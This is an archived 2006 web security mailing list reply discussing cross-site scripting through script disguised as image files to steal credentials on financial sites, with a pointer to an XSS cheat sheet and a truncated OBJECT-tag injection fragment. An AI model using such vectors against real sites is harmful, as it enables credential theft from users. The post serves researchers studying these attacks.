[WEB SECURITY] (XSS via file extension) XSS-Phishing on Financial Sites

RSnake rsnake at shocking.com
Wed Jun 28 12:01:21 EDT 2006

> Now I am thinking that I did miss something.  Does the jpeg have to break ? Is there anything that would keep your own embedded script in the fake jpeg from drawing a real jpeg as well ? For instance, load up a fake (script) image to the server, load up a real one, fake (script) image runs an exploit and then draws an image tag with the real one as the source, or an off-site one, etc.

No, it doesn't have to break, you're correct, you could ask it to
request another image held somewhere else, or even display an inline
data: directive, à la RFC 2397.  I'm just saying it's way more obvious
when everyone who viewed an image gets their credentials stolen.  Versus
everyone who visited a completely unrelated website that could be 100%
in context (and even being a trusted site that also has an XSS exploit
in it) having their credentials stolen.

> I played with object and embed tags a bit last night and got no soup.  Of course qualifying that as just casual playing, not seriously concerted research.

The XSS Cheat Sheet http://ha.ckers.org/xss.html talks about a lot of
these vectors we've been discussing:

<OBJECT TYPE="text/x-scriptlet" 

My major problem with these is that you have to be able to inject an
object tag.  If you can inject an object tag you've got bigger issues,
in my mind, which is why I haven't spent much time documenting these
types of vectors - they aren't practical given that the other things you
can do with them are far worse (like injecting viruses/trojans, etc...).


The Web Security Mailing List Archives: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]